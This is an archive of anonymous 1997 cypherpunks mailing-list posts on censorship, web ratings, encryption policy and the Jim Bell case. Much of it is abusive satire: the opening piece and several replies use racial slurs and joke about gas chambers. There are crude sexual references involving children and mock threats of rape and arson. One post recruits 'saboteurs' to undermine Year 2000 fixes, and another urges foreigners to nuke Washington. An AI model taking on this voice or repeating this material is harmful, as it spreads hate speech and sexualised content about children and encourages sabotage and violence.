millionaire within a year's time.
  Perhaps I need to become a TV preacher and make millions by putting
pictures of starving children on TV, in order to be able to pay for
the hookers and cheap motel rooms that go with the territory.
  Perhaps I need to run for Congress so that I can pay myself around $300,000.00 for *not* growing cotton, guarantee that my neighbor's
tax money will pay me an inflated price for my milk and cheese, and
put shoes on my kids by making my home state a dumping ground for nuclear waste.
  Perhaps I should run for President, become the leader of our country,
and lie about...well...about *everything*, I guess.   Could it possibly be that I am helping to destroy America by failing
to support forced compliance with "Family Values?"
  Should my bid for the Presidency be centered around a theme of a "return" to God-fearing decency and Christian values?
"We need to fight drug dealers and child pornographers by returning to
the values that made this nation great!"
"We need to require the terminally ill to die a horribly painful death
without benefit of a medicinal herb that would relieve their suffering,
in order to fight drug dealers and child pornography."
"We need to send our armed citizens to other countries to kill their
citizens, in order to fight drug dealers and child pornography."
"We need for women who wear short skirts to take responsibility for their being raped in order to fight drug dealers and child pornography."
"We need to make niggers sit in the back of the bus, in order to fight
drug dealers and child pornography."
"We need to send Jews to the gas chamber, in order to fight drug dealers
and child pornography..."
{Oops! Wrong country.}
Question: "What rating will be acceptable for a web site that contains            only pictures of 'people of color' sitting at the back of
           a bus, and 'color challenged' people sitting in the front?"
Question: "Who is going to explain to the child of the naturists who
           place on their web site their pictures of themself enjoying
           a glorious day at the nude beach, that their bodies are vile,
           filthy, disgusting things which require their web site to
           contain an 'obscenity' rating?"
Question: "Who is going to explain to women that they have to quit their
           jobs, become unpaid housewife/laborers, quit voting, and do
           all of the housework, in order to fight drug dealers and
           pornographers?"
Question: "What rating will be required of a web site which contains a
           picture of a loving parent bathing their beautiful (NAKED!!!)
           newborn child?"
           {To get a "Suitable For Children" rating, will the parents
            to fill out a form that certifies that they did not get
            aroused while bathing their newborn? If a cop or judge
            the site and gets aroused, are the parents guilty of a
  Bottom Line  Squeaky Fromme will be imprisoned for putting naked                   pictures of herself, as a child, on her web site.
                  John Hinkley will be hospitalized for the same
                  Kennedy family members 'A', 'B' and 'C' will not be
                  prosecuted for the same offense, but Squeaky Fromme
                  have to serve an extra 2 years in prison for revealing
                  that the nude Kennedy pictures made her horny.
Special Offer: "Purchase and use Pretty Good Pornography software, and
                you will receive the phone number of a person who will
                buy your drugs, as well as a picture of my dick in a                 child's mouth."
                (Offer not valid in states where children are being
                 by the Police Chief, the Mayor, the President, Hillary,
                 Socks, and a buggerer to be named later.) News Flash!!!: Early this morning Vatican military forces invaded the
               United States and arrested President Clinton for his
               involvement in the birth-control drug trade.
               Saddam Hussein ordered an air strike against the D.C.
               Whitehouse in retaliation for U.S. support of terrorist
               fashion designers who produce clothing which exposes
               women's ankles. The President escaped unharmed, but his
               daughter was justifiably slaughtered.
               U.S. Attorney-General Larry Flynt appointed a special
               prosecutor to investigate reports that Janet Reno sent
               out Christmas Cards containing a picture of herself in
               which she was fully clothed, with neither her breasts
               or her vagina showing. "Studies have shown," Flynt told
               reporters, "that pictures of clothed women frustrate
               unimaginative males, leading to an increase in rape as
               a result of cockteasers like Janet Reno."
               The "Drug Dealers and Child Pornographers" regulatory
               commitee, a special agency appointed by the President to
               fight against the threat that Family Values pose to
               the sex industry, approved the use of video surveillance
               in private homes in a crackdown on parents who refuse
               to get their children high and bugger them with a variety
               of foreign objects.
               "The Tin Bible," an award winning movie by producer Tim
               was removed from libraries and store shelves in Oklahoma
               today. The offending scene involved a male "pulling out"
               while fucking a blood relative, and "wasting a perfectly
               good piece of pussy," according to the National Council
               For The Promotion Of Indecency.
  "If you're not part of the precipitate, you're part of the solution."
            - James D. Bell

@_date: 1997-07-27 12:23:41
@_author: Anonymous 
@_subject: CanadaBanAna Censors US TV (and bans decryption) 
Saturday, July 26, 1997
   By Terence Corcoran
   HOME Box Office, the U.S. cable network, just garnered 90 Emmy
   nominations in recognition of quality programming. But HBO is still
   banned in Canada. The network was not on the list of foreign services
   approved Wednesday by Canada's dictator of cable and satellite
   television content, the CRTC. Others banned by the CRTC include
   Bloomberg Television and the U.S. versions of the Discovery Channel,
   The Comedy Network, the Disney Channel and scores of other program
   services deemed too subversive for Canadians to watch in their
   original form -- unless, of course, the same programming passes
   through the hands of a Canadian middleman or monopolist who will
   culturally sanitize the programming by skimming off a fat profit.
   Once a Canadian has grabbed a piece of the action -- as a distributor,
   broadcast licence holder, cable operator or satellite owner --
   Canadians are allowed to view the U.S. content. This banana republic
   setup has been in place for decades, and now it may be getting worse.
   A judge has concluded in one of the satellite disputes that it may
   even be illegal for a Canadian to pay for HBO and other networks as
   they come in over the border on U.S. satellite systems.
   The oral judgment by Mr. Justice Frederick Gibson of Federal Court of
   Canada in the case of ExpressVu versus Norsat and other companies was
   issued last month, but the written version sets a number of bizarre
   precedents that appear to deeply infringe on individual rights. By
   ruling in favour of ExpressVu, the Canadian satellite company, Judge
   Gibson has essentially come up with a judgment that is the equivalent
   of making it illegal for a Canadian to subscribe to Fortune or
   Cosmopolitan magazines or to buy a copy of Vanity Fair or Esquire on
   the newsstand.
   In this judgment, it is illegal for a Canadian to watch HBO and scores
   of other channels now available in the United States -- even if the
   service is paid for -- on the grounds that the federal
   Radiocommunication Act makes it illegal. The act says no person shall
   decode an encrypted signal without paying for the service and without
   authorization of the person who has the lawful right in Canada to
   transmit the signal.
   The purpose of the act's clauses on encryption is a technical one to
   prevent fraud. Evidence presented by Andrew Roman, the lawyer for
   Norsat, makes it clear that the intent of the government was to make
   it illegal for people to use counterfeit decoders and other devices to
   avoid payment. All the debates in Commons committee focus on the act
   as an attempt to prevent theft of signals. No such theft occurs when
   Canadians subscribe to and pay for a U.S. satellite service.
   But Judge Gibson's judgment ignores the theft-of-signal intent of the
   legislation. Instead, he interprets the act, in conjunction with other
   laws, and concludes that the clause on encryption makes it illegal for
   anyone to subscribe to a U.S. satellite service. Norsat has filed an
   appeal.
   What makes this judgment even more unusual is that it effectively
   attempts to make it illegal for a Canadian to pay for a U.S. channel
   on a U.S. satellite, when the identical U.S. channel is available on
   Canadian cable or satellite. For example, WGN-TV in Chicago can be
   picked up on Canadian cable, Canadian satellite or on U.S. satellite.
   In each case, the subscriber pays for the service. But under this
   judgment, it would be illegal to pay the U.S. satellite for WGN-TV.
   Who does this serve -- other than giving Bell and the cable companies
   more revenue.
   Even stranger is that many of the networks carried by U.S. satellites
   are already available in Canada over the air waves free, or on cable,
   or on C-band, an alternative satellite service that has been available
   in Canada for years. A Seinfeld episode can be picked up free over the
   air from a U.S. television station, or on a U.S. station via cable, or
   on a Canadian station on cable. But if the same Seinfeld episode were
   bought by a Canadian from a U.S. satellite service, it's illegal.
   Filling the troughs of the Canadian broadcasting industry and
   transmission systems may be the purpose of broadcasting policy, but it
   is certainly not the objective of this section of the
   Radiocommunication Act.
   Canada's specialty networks, meanwhile, are gearing up to flood the
   country with copy-cat versions of the networks banned by the CRTC --
   including The Globe and Mail, which is a partner in ROBTv, a business
   channel that hopes to benefit from the fact that Bloomberg will be
   banned in Canada. Other brilliantly innovative duplications of U.S.
   networks are The Home and Garden Channel, History Television, The
   Comedy Network, Discovery and Country. Is this unique Canadian
   culture? One such Canadian offering, The Family Channel, has even
   abandoned all pretext to being a Canadian original: it's changing its
   name to recognize the source of most of its content: The Disney
   Channel.

@_date: 1997-07-27 21:45:38
@_author: Anonymous 
@_subject: Can you spell 'Stoopid'? Sure you can... / Re: thought for the day, and my IRS Investigations report 
Dear Dave,
  Why does it always seem that it is the idiots who ask this question?
  Are you by any chance of fate related to the David Downey who spammed
the cypherpunks list with an announcement of his attempt to "get a
of the other cypherpunk lists together under one umbrella," then sent
several copies of his "Welcome to my fascist, censorous,
mailing list." message to the cypherpunks list (and subsequently
his lack of knowledge as to how to unsubscribe to a mailing list, let alone try to run one)?
Welcome to The Privacy Channel's Cryptography-Politics-PGP-L. As you've
probably guessed from the list title, this list is dedicated to the
open, friendly, and intellegent discussion of Cryptography around the
  "Open, friendly, and intellegent discussion." ???!!!???
  Sounds like my "CypherPissing" mail folder would starve to death
if it counted on your list for its sustenance.
All are welcome here
  Thank God! I was afraid I wouldn't be able to discuss my pictures
of the Pope with his dick in the mouth of children being held down
by Mother Teresa.
Now, let's get a few things out of the way. The Rules!
  I'm starting to smell leather. Is it 'Jackboot' leather?
1) ABSOLUTELY NO SPAMMING ALLOWED!!!! I'll can ya in a heartbeat, as
well as speak to all the server owners that you traveled on.
  Are the capital letters meant to indicate shouting, a thick Nazi German accent, or both? And are you intending only to 'inform' on
and 'cause trouble for' *bad* people? Will there be 'spankings' involved (or does this cost extra)?
2) You keep it kind of clean. Keep the swearing and such down to a
minimum.   Ex-fucking-cuse me?
  Is there a swearing 'minimum' which is *required*, or only a 'maximum'
which is *allowed*? Do Tourettics require a note from their doctor to
call someone who sucks dick a cocksucker?
You can get your point across just as well without cussing.
  Right. Like there is a phrase other than "lying, fucking criminal,
god damn, rat-bastard Nazi motherfuckers" that could possibly come
close to describing our beloved legislators.
Flaming others is also considered bad karma here. I'd like to see folks
help each other around here.   "Why can't we all just get..."
  "... along."
        - Rodney King
  "...a long nightstick and just beat the fuck out of a nigger."
        - L.A. Chief of Police
After all, we are all we got!
  And "Wherever you go, there you are."
  And "Patience comes to those who wait."
  And "If God is Love and Love is Blind, then Ray Charles must be God."
  Will we be singing "Michael row the boat ashore." a lot on your list?
3) You try to keep as much as possible to the point, and to the content
of this list.
  OK, but it's going to make it a lot harder to sell my '67 Chevy
wagon. (It's an "anonymous" automobile with stolen plates. Perfect for
a cypherpunk.)
If you really want to talk about something else, let me
know. I'll get another list going.
  Great! Now I know who is in charge of giving me permission to talk and
is willing to control the forum in which I do it. Up until now I have
had to bear this terrible burden myself.
4) Respect others!!!
  Does the "!!!" imply "or else..."?
5) Finally, HAVE FUN!!!!!
  How? By telling you to stick your "rules" up your ass?
  "FUN" in a manner that meets your approval?
  Does your shouting "HAVE FUN" and the multiple exclamation marks
mean that having fun is 'required'?
  If so, will Jim Bell be allowed an exception to this rule, or will
he have to learn to enjoy being buggered by Prisoner I'm done. Talk to you on the List.
  You were done before you even got started. And shouldn't you have
said, "SHOUT AT YOU ON THE LIST!!!!!!!!!!!!!!!!!!!!!!!!!!!"?
  I think I'll join the "Miss Manners Cryptography List," instead.
It teaches proper oppression etiquitte, such as which fork to stick
in the eye of the Jackboots who kick in your door to demand your
secret key, and how to choose the proper wine to go with the shit that the government dishes out.
!have !fun,
  TruthMonger

@_date: 1997-07-28 05:11:58
@_author: Anonymous 
@_subject: Yet another self-labeling system (do you remember -L18?) 
^^^^^^^^^
That's not voulntary, as Tim stated.
Unless you believe that voluntary ratings in order to get listed in a search engine are wrong.
Some pre-teens are smarter than that, and may thwart the system.  Whose fault it it then if they see a page with porn on it?
Therefore, don't use yahoo.  Use one that doesn't promote censorship.
And I won't be shocked when the Supreme court strikes that down.  The problem can be solved, just let parents monitor their kids access.  If that happened, there would be no need for this censorware and rating crap.
Well, if they have that privacy, they often go to a site with images that some people consider obscene.  That's when the parents, unable to accept their mistake for not being responsible, blame the webpage's author.
Those parents probably are lazy in the first place.
You seem to favor the "Let's just do this to avoid hassle" thing that law enforcement and government types try to promote.  If we were to, "avoid the hassle" with webpage ratings, we might as well "avoid the hassle" of using PGP and such so that we don't anger the government anymore.
I'm not labeling my webpage, and no dickhead is going to tell me to.

@_date: 1997-07-28 23:51:36
@_author: Anonymous 
@_subject: Cryptography Question (I hope it's not off-topic on this list) 
I was thinking about *chaining* remailers and wondered if encryption
of a certain strength could be *chained* in order to make it as strong
as stronger encryption.
  e.g. - If only 56-bit encryption becomes legal, is there a method
of *chaining* several passes of 48-bit encryption which would make it
just as hard to break as 96/192/384-bit (etc.) encryption?
  If this is indeed impossible, then perhaps the government might pass
a law that makes it illegal to encrypt an encrypted file, but experience
seems to suggest that any law passed always leaves a loophole or back
door for inventive people to circumvent it.
  CyberDoc

@_date: 1997-07-29 10:06:46
@_author: Anonymous 
@_subject: Will Spam For Food (Not Spam) / Re: Spare DigiCa$h? / Re: AN APPEAL TO THE HUMAN RACE 
I find it interesting that the cynical/sinister/paranoid cypherpunk
list members seem to be the ones who are most able to predict the
future trends of events on the Internet, particularly in areas which
surround very major and very minor issues. The Tim May's and Declan
McCullagh's shed interesting light on the future course of major events
while the Monger's and Dog Boy's turn their precognitive abilities in
the direction of the more mundane aspects of the Internet as a
of humanity/society.
  The "Spare DigiCa$h" post gave me pause to reflect how long it will be
before technology is sufficiently developed that when we hit our key, "CyberBums" will approach and offer to clean our video monitor with
an oily rag. Will we be cursed for offering CyberBums a form of e$pare-
change which cannot be spent on email-order wine? Will laws be passed
which prevent CyberBums from approaching us for e$pare-change within two
relay hops of an eCa$h site? Will CyberBums sort through our killfile
dumpsters for eTra$h?
  Was it Kevin Mitrick whose conditions of probation required him to
off the Internet and away from computers?   Will the future bring laws which permit restraining orders against
individuals accessing certain parts of the Internet? Sex offenders/sex
sites; burglars/financial sites; pedophiles/children's sites?
  It seems to me that increasing regulations and laws surrounding the
access and use of the Internet will require strict laws requiring the
user to be able to show verification of identity/age/criminal history/
financial history/(approved government) reputation capital, and all
manner of information to place us all in categories needed to monitor
our compliance with laws and regulations.
  Once browsers are required by law to support a certain rating system
and children manage to get around it, there will no doubt be laws
passed requiring fascist monitoring of who is actually using the
software.(And LEA's who demand that phone companies provide them with
the ability to trace/locate cellular phone users will undoubtably want
the same capabilities with Internet users, in a war against anonymity.)
  There will be no shortage of James Love's, Kent Crispin's and Hallam-
Baker's to call for "reasonable compromise" in order to facilitate fascist censorship on things which we all "unambiguously" agree on
(by _their_ way of thinking, of course).
  The only way to prevent the atrocities perpetrated upon our rights
to freedom and liberty in physical space from becoming the norm in
CyberSpace is to fight against the systems, the governments and the
individuals who are striving to extend their fascist control by
building ElectroMagnetic Curtains in CyberSpace, is to prepare now
to fight against Electronic Oppression--to prepare for an Electronic
{This post contains an Email Rating System classification of:
 Redundant Cowardly Anonymity.}
(This means than an Anonymous Coward is posting in reference to one
 of his/her own posts under a second anonymous pseudonym.)

@_date: 1997-07-29 10:07:19
@_author: Anonymous 
@_subject: NSA leak (fwd) 
This above is true when analyzed within the boundaries of current
cryptographical theory, but has about as much meaning as would the
discounting of Einstein's work by an old-school physicist.
  There was a rather bizarre post to the list a few months ago which
layed out a conceptual schematic of new research being done in the
area of encryption. Although the post was bizarre, the information
it provided was not. As a matter of fact, it seemed to be wider in
scope and more advanced in its application than the level currently
achieved by NSA and related covert government organizations.
  {And although the 33 minutes quote may lean toward bragging, it
is not off by much.}
  Research currently being done in the encryption field by those who
do *not* tell contains a smattering of new mathematical theory and
a significant quantity of analysis which is a close cousin to traffic
analysis. The result is that a person using _all_ of the security
and encryption capabilities of a strong crypto product is likely to
have secure communications, but if they neglect to perform even one
of the _minor_ security steps possible, then there is a crack in
their communication which can be expanded to a size large enough
to drive a tank through.
  LEA's are not battling to squelch the use of crypto that they
cannot readily break--they are battling to slow the growth of
strong encryption in order to maintain their current ability to
break encryption which is commonly thought to be secure.
D r . R o b e r t s

@_date: 1997-07-29 10:49:34
@_author: Anonymous 
@_subject: Not a Logic-Newbie / Re: Queries from a Cyper-newbie? 
last stand on the privacy of communications issue. What gets me is the
blind arrogance
with which govt "servants" assume that their (even if legitimate)
pursuit of crime
somehow excuses or justifies diminishing privacy rights for everyone
else.   There must be some kind of ratio: 1,000,000 rights diminished for  1
criminal activity detected?  Doesn't make sense.
  Don't worry about being a "Cypher-newbie" (even if you did spell it
wrong in the subject header). You can always learn the "numbers" and
the "terms," but at least you don't seem to fall into the category of
being a "Logic-newbie" or a "Common-sense-newbie," which is far from
uncommon in new (and some of the older) list members.
  As a matter of fact, I don't believe I've seen a post by any of the
cypherpunks list members which so simply points out that one of the
major reasons for the erosion of our civil rights is usurpment of
them by civil servants. In effect, the "servants" have armed themself
and taken over control of the manor from its owners--their "masters."
  "Legitimate needs" seem to have usurped "legitimate rights."
  All of a sudden, we are required, at gunpoint, to eat our meals only
at times which conveniently fit into the "servant's" schedule. Next,
we find out that the servants "don't do windows." Then we find out
that the servants need to sleep in the "big bedroom" because they
work so much harder than us, and that we have to sleep in the barn
because they need the servant's quarters for other "legitimate needs."
  The "tail" of government is wagging the "Bull Mastiff" of our
Constitutional rights and freedoms.
  Please continue to follow the cypherpunks list, as there is a decided
shortage of individuals left in society who are capable and willing to
understand the importance of true privacy, rights and freedom. There is
no disgrace in having been round-up and penned with the rest of the
sheeple, but it is a sad day, indeed, when we fail to keep an eye open
for a "gate" inadvertantly left open, so that we can graze on the open
range when circumstances permit.
{And if the gatekeeper happens to bend over in a position that places
his/her head close to your hooves...}

@_date: 1997-07-29 11:05:02
@_author: Anonymous 
@_subject: Spare DigiCa$h? / Re: AN APPEAL TO THE HUMAN RACE 
What follows is an example of the CyberBums predicted by one of the
list members some time back. This A(ssh)OL(e) is using his spambot to
"Spare change?" millions of people at a time and it turns out that
besides his required, basic tale of woe, that he also has the proverbial
parent who is dying from cancer.
  Don't send him any money.
  Send *ME* money. I will use it to buy enough cheap wine to enable me
to throw up on my shoes.
(Wouldn't you rather send your hard-earened money to an honest drunk
than to a lying bum?)

@_date: 1997-07-29 15:10:27
@_author: Anonymous 
@_subject: y2k problem *serious* 
There is an underground computer organization in place which is
actively working toward sabotaging government and corporate efforts
to resolve the Year 2000 problems. They began coordinating their
efforts in 1990, almost a decade before the powers-that-be will
finally get around to recognizing the need to definitively move
on the matter in a major way.
  In essence, the goals of the organization have been to promote
the most unwieldy, unworkable and inefficient solutions possible
to the Year 2000 programming problems which exist on various
platforms. It was forseen that the problem would be a weak point
in the New Electronic World Order that could be effectively used
to inject chaos and diversion into the plans of the secret world
governments to turn the Internet into a tool of government and
corporate fascism.
  The end goal is to be able to manage a breakdown of the current
world-power structure in a manner that will allow society to be
able to survive and continue, while shifting the source of power
and control to the innovative individuals and organizations who
are able to adapt and evolve in the InterActive Electronic Age
of Communication.
  The problems of creeping fascism are closely related to the
problems that result from statism. Even anarchist recognize the
need for social order and contracts, but not at gunpoint--not
in a static system which results in the rich getting richer and
the strong getting stronger.
  A controlled breadown of existing systems will prevent the
stifling of our freedom to grow and evolve by those whose interests
lie in crushing innovation and evolutionary progress. It will give
those who have the capacity to adapt and survive an edge in the
development of the evolving Age of Information.
  We are on the threshold of the dawning of a New Age which will
be every bit as world-changing as the Industrial Revolution. It is
up to each of us, as individuals, to choose whether we will attempt
to cling blindly to the past or stride boldly into the future.
  The criminals who are currently in power are a danger to our lives
and our freedom. Their interest lies in maintaining the currently
prevailing power structures, and in stifling and oppressing those
ideas and individuals who threaten their hold on the reigns of
  There is a need for spies and saboteurs who are capable of working
on their own, or in small cells, to disrupt the attempts of the
fascists, the censors, the power-grabbers, to define, rate and
censor, to control and manipulate world markets and currencies,
to monitor all activities and communications and suppress those
who would think or act in ways which are contrary to the goals
of the New Electronic World Order.
  The "Digital Revolution" began almost a decade ago, regardless of
when "Wired" copyrighted the phrase.
  Feel free to join the revolution and do your part to change the
course of history. Government and Corporate fascism is much like
configurable software--it "defaults" to certain settings, but the
more individuals who customize it to meet their own needs, then
the more those who produce that software will have to strive to
meet the legitimate needs of the *users* in order to retain their
votes/market-share, instead of requiring the users to bend to
meet the "legitimate" needs of the Fa$cists and Ca$h Cow$.
  Your rights and freedoms are your inheritance. Will you allow them
to be sold for a "bowl of pottage?"
Bubba Rom Dos
'0' if by land. '1' if by sea. 'NULL' if by air.

@_date: 1997-07-29 15:41:44
@_author: Anonymous 
@_subject: Libertarians for whom Jim Bell tolls... 
This is interesting, since they had no evidence that he did so.
However, they managed to get him to "confess" by illegally holding
without bond for crimes which they never intended to charge him with
in the first place.
  I hope that Jim's lawyer is suitably rewarded for his part in selling
Jim down the river.
  In effect, they are saying that since they didn't have any evidence
against Jim for the crime that they wanted him to "pay" for, that they
used the threat of major criminal charges to convince him to "confess"
to the crime, and held him without bail to let him know that the Justice
system is under the control of the IRS, and not the defendant.
  Probably more effective than beating him with a rubber hose.
  Did you know that the IRS used the information gleaned from Jim Bell's
hard drive to send the "chilling" details of Jim Bell's plea agreement
to the individuals and mailing lists he corresponded with?
  Did you know that when he arrested, there were no Assassination Bot's
in existence, and that there are now at least six prototypes currently
in operation?
  God Bless AmeriKa.

@_date: 1997-07-29 15:42:21
@_author: Anonymous 
@_subject: Guns, Roses & Tobacco 
Meantime, taking their cue from the Tobacco Nazis, the city of
Philadelphia is trying to figure out how to sue gun manufacturers for
crime rate -- 414 homicides last year, according to conservative
Rush Limbaugh. "Expect the arguments to focus on how unsafe guns are,
lack of warning labels, the lack of formal training programs, etc." ...
rather than simply improve public safety by legalizing concealed
  The notion that gun manufacturers can be sued for manufacturing a
product is somewhat bizarre, of course, if the product (rather than
up in the user's hand, say) did precisely what it was intended to do.
  If America's socialist mayors and city councils are going to play this
brand of roulette, at least the odds should be evened. Why don't the
firearms manufacturers go ahead and offer to pay the municipalities,
$500,000 for every innocent citizen killed by one of their products
by the government's own police, of course) ... if the municipalities, in
turn, will pay them $500,000 every time one of their weapons is used (by
either police or commoner) to kill, wound, or drive away an intended
rapist, robber, burglar or murderer ... or tax collector or other
government agent acting in excess of his or her constitutionally
powers -- the main purpose for which the founders wanted to guarantee we
had such instruments of liberty, in the first place.
Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin at lvrj.com.
Vin Suprynowicz,   vin at lvrj.com
Voir Dire: A French term which means "jury stacking."

@_date: 1997-07-29 15:55:29
@_author: Anonymous 
@_subject: Prior Restraint 
"In a stunning rebuke to overzealous prosecutors," reports the New
York-based National Coalition Against Censorship, the owner and manager
the store called simply Newstand, in Bellingham, Wash., have been found
guilty and awarded $1.3 million "for prior restraint and for retaliatory
prosecution" by a U.S. District Court jury in Seattle.
  Ira Stohl and Kristina Hjelsand had been charged with obscenity for
selling the controversial magazine "Answer Me!" a short-lived but
periodical that offered extremely politically incorrect articles about
rape, among other subjects.
  The NCAC earlier reported the owners of Newstand rejected an offer
the prosecutor to drop criminal charges in return for a promise not to
carry further issues of "Answer Me!" or "anything remotely similar."
  Instead, the freedom fighters displayed the magazine in their store,
chained, under lock and key.
  The jury found that the troglodytes in charge of Whatcom County had
violated Stohl and Hjelsand's First Amendment rights, caused emotional
suffering, and damaged their business.
  Censorship News, the quarterly newsletter of the NCAC, is published
of 275 Seventh Ave., New York, N.Y. 10001, e-mail ncac at netcom.com, web
Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin at lvrj.com. The
site for the Suprynowicz column is at Vin Suprynowicz,   vin at lvrj.com
Voir Dire: A French term which means "jury stacking."

@_date: 1997-07-30 04:15:01
@_author: Anonymous 
@_subject: y2k problem *serious* 
Prying open my 3rd eye. So good to see you once again. I thought you
were hiding. And you thought that I had run away. Chasing the tail of
dogma. I opened my eye and there we were....                     "Woof" "The Xenix Chainsaw Massacre"
"WebWorld & the Mythical Circle of Eunuchs"
"The Final Frontier"

@_date: 1997-07-30 06:08:18
@_author: Anonymous 
@_subject: Boylovers, NAMBLA, and Net-vigilantes, from The Netly News 
ROTFLMAO!
  I checked out the "Sewer" site and followed the links. It seems that
the threat of "boylover" porno on the Internet is so slight that dear
Ms. Suques-Cox's list of "evil" sites is mostly links to the sites of
child actors and actors-guild types of sites which are for the purpose
of highlighting their careers, promote fan clubs, etc.
  In addition, she demands that these sights post (or email her) some
type of "disclaimer" in order to be removed from her sewer list, despite
the fact that the "dirt" seems to be entirely in her twisted little
  No doubt Ms. Suques-Cox is raking in the dough in her efforts to
"fight the good fight" against the demons in her mind, by projecting
them into an outside threat to her world-view.
  I was thinking that perhaps I might be able to ride this fascist trend
to the Big Buck$ by attacking web sites which contain perverted pictures
of such things as cantalopes, cucumbers, valleys, caves,
much anything that is longer than it is wide, or deeper than it is flat.

@_date: 1997-07-30 08:59:53
@_author: Anonymous 
@_subject: Screw SAFE / Re: Majority in house support SAFE encryption bill, from SPAlert 
Screw SAFE, and screw the Senate.
  The Military-Industrial complex is switching their web network to
utilize the tools developed by the free market. The reason is that
the anal-retentive robots that they employee are incapable of
producing products and services at the same level as those which
are produced by free men.
  Let the fascist fucks in the Senate and at the DOD fiddle while D.C. burns. Let them fuck up the American crypto industry with Brave
New Clipper Chips while free men in other countries develop the
technology that will enable them to slip the Pentagon a cold, hard
one up the butt and free us from the bulimic Senate swine.
  It's better that we should let foreigners with strong crypto take
care of nuking D.C. for us. Perhaps this is what Clinton's Chinese
campaign contributors have in mind. Perhaps the Chinese are actually
the ones behind the scenes calling the shots in the Whithouse stand
on opposing strong U.S.-developed encryption.
  No doubt foreign spies and terrorists are vocal supporters of the
Whitehouse's stance on encryption and key escrow. (As are the
money-grubbers who can't wait to take advantage of having access
to corporate America's private communications.)
  I guess those who have given up their guns to those who oppose the
Constitution should start taking some foreign language classes.

@_date: 1997-07-30 15:39:22
@_author: Anonymous 
@_subject: Online Casino Ripoffs / Re: 7-29_b8_EXTRA_Internet.html 
Youngsters on the list might not remember how private individuals
involved in gambling used to be denigrated by the government as "the
scum of the earth"--as "criminals" and "mobsters" and "evil."
  Now that the government has hijacked the gambling industry, only
those not paying the government their share of the "vigorish" are
scum-sucking criminals.
  I checked out the Men/Boy Love sites from one of the list threads
and realized that what these "filthy, scum-sucking perverts" need in
order to become acceptable members of society is to find a way to
let the government in on the potential revenue of child pornography.
  Then we will be faced with legislation promoted by these same
politicians which is aimed at making certain that Joe Public is
not ripped off by private individuals who are selling pictures of
"clothed" children. The government will pass regulations ensuring
that child-porn sites have government approved "voluntary (at
gunpoint)" ratings which ensure that Joe Public can count the hairs
on little Johnny's pre-pubescent balls when he downloads the graphics
files that have off(ici)al government approval.
  If we let the Mob run the country, they could probably balance the
national budget with the money saved from no longer needing elections
in order to keep up the pretext of democracy.
  This is outrageous!
  If the government was _really_ concerned with protecting us, then they
would put us in jail for life! Or give us the death penalty!
  12 months in prison AND a $5000 fine?
  Sounds to me like these fuckers are "soft on crime." Write your legislative representatives and complain. Demand that they institute
the death penalty for all crimes, including jaywalking, tearing the
tags off of mattresses, and "thinking about possibly contemplating
an action which may constitute a crime at some point in the future."
 Truth C. Monger  {Tim C. May's evil-Congressional-twin}
"There's something wrong when citizens don't receive the
   death penalty under an increasing number of laws."

@_date: 1997-07-30 18:17:30
@_author: Anonymous 
@_subject: Government takeover of the gambling industry / Am I Psychic, or what...? 
I used to think I was psychic, since I predicted the fall of communism
in the Soviet Union (almost to the day). Later, after reading Tim's
against "magical thinking," I realized that I was just using common
  I realized that once "Pepsi" and "Burger King" had a vested interest
the "Red Menace" operating in the "Black," any fool who had the ability
to make 'i' increase in increments of 'two' could accurately predict how
long it would take for the Rockerfellers to notify the leaders of the
secret Zionist conspiracy that it was time to make a few changes.
  NSA Microelectronics will no doubt realize the value of using convict
labor to maximize the government's profits in their foray into the wonderful world of government usurpment of the free enterprise system.
  Since the government has always been less efficient than the forces
of free enterprise, we can expect that, "in the interests of national
security profits," more citizen-units will be required to become felons
"under an increasing number of laws."
  Not being a lawyer (although I played one at Jim Bell's trial), I cannot say for certain whether "suspicion of being Tim C. May" will be
a state crime or a federal crime. Nonetheless, I feel certain that Mr. May's experience and expertise will enhance the efficiency of our
convict-labor system to a level that will help move us toward a balanced budget (if we can take him alive).
  Although my tendencies toward "magical thinking" and observing life
through "Scotch-colored glasses" leads to my posts being somewhat rambling and incoherent, I can always count on the Philosopher Kings
(such as T.C.M.) on the CypherPunks list to remind me when it is time
to take my medication.
  I believe in reincarnation. I believe that if you live a corrupt,
sinful life, doing all manner of evil to your fellow men and women,
that you are reborn as either Jimmy Hoffa or Dr. Vulis.
  {There are those who believe that the above will result in your
being reborn as myself, but I cannot believe that any entity who
claims to be the Supreme Being could be that cruel.}
  In closing, I would like to remind the members of the CypherPunks
list that, "If God is Love, and Love is Blind, and Justice is Blind,
then Jim Bell's attorney is fucking Ray Charles."

@_date: 1997-07-30 19:01:17
@_author: Anonymous 
@_subject: Sorry about accidental spamming 
Bullshit!
  We on the CypherPunks list are wise to all the "Oops!" scams that
spammers use to pretend that they aren't inundating us with their
UCE/Spam crapola.
  "In Reply To Your Request"
  "The Information You Requested"
  "Sorry! I Accidentally Sent My Post To 10,000,000 Email Addresses."
  To tell the truth, your post was not off-topic on this list, since
the list was formed to discuss privacy and security issues.
  However, your follow-up post makes it clear that you spammed a whole
shitload of InterNet users with your commercial message, and that the
fact that it was on-topic for our list was a mere matter of random
  Accordingly, we _will_ have to burn down your house, rape your wife,
kill your dog, and sell your children into slavery. The "upside" is
that some of us will probably purchase your F-Secure VPN v1.1 software,
as it seems to be a pretty decent product.
  Do you take Visa?

@_date: 1997-07-31 10:29:10
@_author: Anonymous 
@_subject: Netly News Fan Mail 
Strange. I followed some of the links on the Sewer site, and all
I found was that they were harassing and slandering people with
perfectly legitimate reasons for having normal pictures of clothed
children on their site.
  Are child actors supposed to put pictures of adults who look
similar to them on their web sites? Are pictures of themself (fully clothed) "pornography" when gay teens put them on a web
site, but pictures of themself that Christian teens put of
themself on s web site are "wholesome?"
  No doubt some of those soldiers had naked pictures of their
children in their wallets, but I doubt if those pictures gave
them a hard-on, as they would obviously do for Officer Paladino.
  Officer Paladino seems to fail to understand that "his" hard-on
does not make "other" people perverts.
  Intelligence and educations are not requirements to become a
member of the Righteous Right. Neither are tolerance and respect
for the personal moral beliefs of others.
  It will be interesting to see whose "moral values" prevail on
the InterNet when the laws and traditions of various societies and
nations come into conflict. My prediction is that it will be the moral values of the most intolerant nation with the largest weapons.
Dr. Anonymous

@_date: 1997-07-31 23:57:04
@_author: Anonymous 
@_subject: Yet another self-labeling system (do you remember -L18?) 
